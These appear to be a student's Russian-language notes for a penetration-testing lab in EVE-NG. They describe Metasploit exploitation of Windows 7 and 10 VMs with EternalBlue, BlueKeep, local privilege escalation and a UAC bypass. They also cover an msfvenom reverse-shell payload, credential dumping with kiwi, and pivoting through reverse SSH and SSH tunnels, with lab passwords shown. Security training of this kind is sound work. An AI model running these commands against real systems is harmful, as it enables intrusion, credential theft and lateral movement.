# Practice 3 4 new [toc] ## Задание к практической работе №3 - Построить инфраструктуру в системе EVE-NG (есть возможность ее импортировать) - Настроить каждое устройство в соответсвии со следующими параметрами: - Kali-2021, Win-7, Win-10, Debian - получение адреса DHCP - На PfSense выполнить проброс с внешних 445/tcp и 3389/tcp портов на аналогичные порты win-7 виртуальной машины - Выполнить сканирование внешнего интерфейса межсетевого экрана с помощью nmap и Nessus с целью обнаружения уязвимых сервисов - Использую Metasploit Framework - получить доступ до Windows-7 виртуальной машины - Используя payload meterpreter: - выполнить создание нового пользователя - Выполнить скриншот рабочего стола - получить все учетные записи, находящиеся в памяти системы - Выполнить проксирование трафика во внутреннюю инфраструктуру ## Реализация ## 3 практика (проксирование трафика) ![](https://i.imgur.com/6xsuNGN.png) Инфраструктура: ![](https://i.imgur.com/uBsD9ws.png) Pfsense: ![](https://i.imgur.com/75x5dTH.png) win7 - user, eve@123 win7: Заходим на firewall (admin, eve@123) ![](https://i.imgur.com/PdE9hIc.png) ![](https://i.imgur.com/CrNVeqY.png) Пробросим порты 445 и 3389: ip win7: ![](https://i.imgur.com/zOfkbLD.png) ![](https://i.imgur.com/cMoWwZK.png) ![](https://i.imgur.com/LHXBzUZ.png) kali - user, eve@123 kali: Посмотрим ip адрес (ip a) ![](https://i.imgur.com/EZWrntD.png) Просканируем порты 445 и 3389 на внешнем адресе pfsense в агрессивном режиме: ![](https://i.imgur.com/cXSofxn.png) Подключимся через xfreerdp: ![](https://i.imgur.com/ThiRiOM.png) Документация Metasploit Framework: https://www.offensive-security.com/metasploit-unleashed/ Запускаем msf: ![](https://i.imgur.com/ZS0Mrnq.png) Показать эксплоиты: ![](https://i.imgur.com/grkoyjA.png) Показать пейлоады ![](https://i.imgur.com/MHKcLql.png) Ищем уязвимость ms17-010: ![](https://i.imgur.com/QLcgy1x.png) Информация об eternalblue: ![](https://i.imgur.com/tfI72fd.png) kali: Для использования eternalblue - use 0: ![](https://i.imgur.com/rcEzMif.png) show options - параметры set forceexploit true/false - необязательный параметр set rhosts 192.168.44.130 - куда подсоединяться (указываем внешний ip pfsense) run - запустить ![](https://i.imgur.com/3Kw6wpb.png) Meterpreter commands: https://habr.com/ru/post/131112/ Продвинутое туннелирование: https://habr.com/ru/post/326148/ search bluekeep use 1 ![](https://i.imgur.com/SaYqkfX.png) show options set rhosts 192.168.44.130 show targets set target 8 run ![](https://i.imgur.com/gE6YdU2.png) screenshare - запись экрана ![](https://i.imgur.com/iJV071z.png) shell - командная строка chcp 65001 - поменять кодировку whoami ![](https://i.imgur.com/NcvmdXo.png) exit show payloads Меняем payload: ![](https://i.imgur.com/seT8h3Y.png) ![](https://i.imgur.com/U6wnDcJ.png) set viewonly false run Возвращаем payload: ![](https://i.imgur.com/5pn9B0w.png) run Загружаем kiwi: ![](https://i.imgur.com/e0s4TYz.png) creds_all bg > Выбираем пост эксполит методы: > ![](https://i.imgur.com/oAPRFl9.png) > > ![](https://i.imgur.com/pFqkJ1s.png) > > show options > sessions > set sessions 6 > ![](https://i.imgur.com/ErDAFzO.png) Возвращаемся к сессии: sessions 6 Создаем пользователя: ![](https://i.imgur.com/QiKlAWe.png) Пробрасываем порт до pfsense с win7: portfwd add -L 192.168.44.131(kali ip) -l 2323(random port) -p 443(win 7 port) -r 192.168.1.1(pf sense local ip) ![](https://i.imgur.com/LiUlsjK.png) Подключаемся к себе на порт: ![](https://i.imgur.com/wQ2Wl1i.png) ![](https://i.imgur.com/hSMLJbc.png) // Подключаем kali внутрь инфраструктуры: ![](https://i.imgur.com/0iHmn2M.png) kali: Заходим под рут: ![](https://i.imgur.com/1HgwhO3.png) Сканируем сеть 192.168.1.0/24: ![](https://i.imgur.com/NdaAmS3.png) Узнаем операционную систему: ![](https://i.imgur.com/YnsVRjs.png) Сканируем в агрессивном режиме: ![](https://i.imgur.com/GZTiP1d.png) kali: msfconcole show exploits search 2021 kali: apt update apt install metasploit-framework cd /usr/share/metasploit-framework ls -lh cd modules ls -lh cd exploits ls -lh kali: msfconsole search 2021 search 2022 search 2020 search smb search ms17-010 use 0 show options set rhosts 192.168.1.102 run bg kali: nmap 192.168.1.0 -sn nmap 192.168.1.105 -A win10: выполнить mmc -> добавить оснастку -> локальные пользователи -> ок -> новый пользователь отключаем защитник, брэндмауэр и включаем удаленный доступ kali: nmap 192.168.1.105 -A > set rhosts 192.168.1.105 > run > search bluekeep > use 1 > set rhosts 192.168.1.105 > run > set ForceExpit true > run > set fDisableCam=0 > run > set rhosts 192.168.1.102 > run > show targets > set target 8 > run Для взлома win10 создадим пэйлоад: MSFVenom: https://www.offensive-security.com/metasploit-unleashed/msfvenom/ Payload: https://habr.com/ru/company/ruvds/blog/343612/ Создаем payload: kali: msfvenom -h mkdir payloads cd payloads msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.103(kali) LPORT=4444 -f(тип файла) exe -o(аутпут файл) meterpreter.exe ls ![](https://i.imgur.com/yydNQ0o.png) Поднимаем сервер для передачи ексешника: kali: python -m http.server 80 ![](https://i.imgur.com/ABLDc3d.png) win10: открываем в браузере 192.168.1.103(kali) и скачиваем exe Настраиваем сервер: kali: msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp show options set lhost 0.0.0.0 run win10: Запускаем exe kali: screenshare screenshot load kiwi creds_all getsystem shell whoami sysinfo Расширим права user1: kali: bg > use exploit/windows/local/cve_2021_40449 > show options > sessions > set session 3 > run > sel lport 5555 > run > use exploit/windows/local/cve_2020_0796_smbghost > show options > set lport 5555 > set session 3 > run > set payload windows/x64/shell/reverse_tcp > run > use exploit/windows/local/bypassuac_fodhelper > show options > set session 3 > run > ![](https://i.imgur.com/KWjgvRT.png) Через win10 ломаем win7 (Reverse SSH): Переносим kali за инфраструктуру С win10 открываем соединение до kali: kali: sudo service ssh start sudo systemctl enable ssh win10: cmd -> ssh ssh user@192.168.44.131(kali ip) ![](https://i.imgur.com/2FI4Fva.png) Магия ssh: https://habr.com/ru/post/331348/ Используем Remote TCP Forwarding kali: sudo -i ss -tunlp win10: cmd -> ssh -R 3390(kali port):localhost:3389(kali port) user@192.168.44.131(kali ip) ![](https://i.imgur.com/HpLRIOK.png) kali: xfreerdp /u:user /p:eve@123 /v:127.0.0.1:3390 ![](https://i.imgur.com/KFhAa6s.png) kali(win10 rdp): cmd -> ssh -R 4445:192.168.1.102(win7 ip):445 user@192.168.44.131(kali ip) ![](https://i.imgur.com/bSYyCHW.png) kali: ss -tunlp msfconsole > search eternalblue > use 0 > set rhosts 127.0.0.1 > set rport 4445 > show options > run kali(win10 rdp): ssh -R 3389:192.168.1.102(win7 ip):3389 user@192.168.44.131(kali ip) kali: msfconsole search bluekeep use 1 show options set rhosts 127.0.0.1 set target 8 run shell whoami ![](https://i.imgur.com/k7ujNTY.png) ## 4 практика (тунелированние трафика) ![](https://i.imgur.com/FrISvr8.png) ![](https://i.imgur.com/LHmoIBf.png) ![](https://i.imgur.com/0biELXu.png) ![](https://i.imgur.com/s7OWBD3.png) Создаем новую практику debian(user, eve@123) debian: ip a Настраиваем ip: nano /etc/network/interfaces в primary network добавляем auto ens3 меняем в primary network все на ens3 save service networking restart ip a ping 8.8.8.8 kali: service ssh status **Reverse SSH connect:** win10: cmd -> ssh user@192.168.44.131(kali ip) cmd -> ssh -R 3395(kali port):localhost:3389(win10 ip, port) user@192.168.44.131(kali ip) kali: ss -tunlp Подключаемся к порту: xfreerdp /u:user /p:eve@123 /v:127.0.0.1:3395 Теперь взломает win7 через debian: debian: ssh -R 3395:192.168.1.103:3389(win7 ip, port) user@192.168.44.131(kali ip) ![](https://i.imgur.com/YWNT4TB.png) kali: xfreerdp /u:user /p:eve@123 /v:127.0.0.1:3395 kali: msfconsole search bluekeep use 1 set rhosts 127.0.0.1 set rport 3395 show targets set target 8 run **SSH tunneling L3:** Включаем таннелинг: kali: sudo nano /etc/ssh/sshd_config PermitRootLogin yes PermitTunnel yes sudo service ssh restart Меняем пароль от рута: sudo passwd root (eve@123) debian: ssh root@192.168.44.131(kali ip) Делаем туннелирование: Проверияем есть ли таб, тан интерфейсы(ip a), debian: ssh -w 0:0(тан интерфейсы на нашей и чужой системе соответственно) root@192.168.44.131(куда коннект, kali ip) ctrl+alt+f2 (новое окно) ip a kali: ip a Настраиваем тан интерфейс: kali: sudo -i ip addr add 10.8.0.1/24 dev tun0 ip link set tun0 up ip a debian: sudo -i ip addr add 10.8.0.2/24 dev tun0 ip link set tun0 up ip a kali: ping 10.8.0.2 Включаем роутинг, чтобы между ens3 и tun происходила маршрутизация: debian: nano /etc/sysctl.conf ip_forward=1 вкл save sysctl -p ip a kali: ip route add 192.168.1.0/24 via 10.8.0.2 ping 192.168.1.104 debian: ip route apt update apt install tcpdump tcpdump -i ens3 Делаем NAT: debian: iptables -t nat -A POSTROUTING -o ens3 -j MASQUERADE kali: ping 192.168.1.1 xfreerdp /u:user /p:eve@123 /v:192.168.1.103:3389(win7) **SSH tunneling L2:** Переделываем инфраструктуру: debian 2 ethernet ports и между pfsense и switch делаем мост на debian (ens3 и ens4 в bridge) debian: ip a apt update apt install bridge-utils nano /etc/network/interfaces primary network: auto ens3 allow-hotplug удалить и поставить manual вместо dhcp везде ens3 добавить auto ens4 iface ens4 inet manual auto br0 iface br0 inet dhcp bridge_ports ens3 ens4 ![](https://i.imgur.com/nUkJH0I.png) service networking restart ip a debian: tcpdump -i br0 tcpdump -i br0 | grep ICMP kali: ip a Делаем тоннель: debian: ssh root@192.168.44.131(kali ip) -o Tunnel=ethernet -w any:any kali: ip a debian: ip a Добавляем интерфейс в бридж: debian: brctl show brctl addif br0 tap0 brctl show Поднимаем tap интерфейс: debian: ip link set dev tap0 up ip a kali: ip link set dev tap0 up tcpdump -i tap0 dhclient tap0 ip a ## Доп инфа Проброс портов (Port Forwarding) https://wiki5.ru/wiki/Port_forwarding 3 практика - Reverse Shell соединение через проброс портов до Win7, Reverse Shell - пользователь запускает код у себя на машинке и устанавливает соединение 4 практика - Reverse SSH соединение за счет наличия машинки внутри LAN и туннелирования трафика на машинку в WAN 445 порт - Microsoft SMB, используется Windows для совместной работы с файлами (EternalBlue — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB) 3389 порт - RDP, удаленный доступ (BlueKeep — это компьютерная уязвимость в реализации Microsoft Remote Desktop Protocol, позволяющая осуществить удалённое выполнение кода) freerdp - клиент с открытым кодом для подключения к удаленному рабочему столу по протоколу RDP Metasploit Framework: exploits - использование уязвимости auxiliary - тест на уявзимость post - код после эксплоита payloads - код на системе Reverse Shell Reverse SSH ![](https://i.imgur.com/Kp2mAvf.png)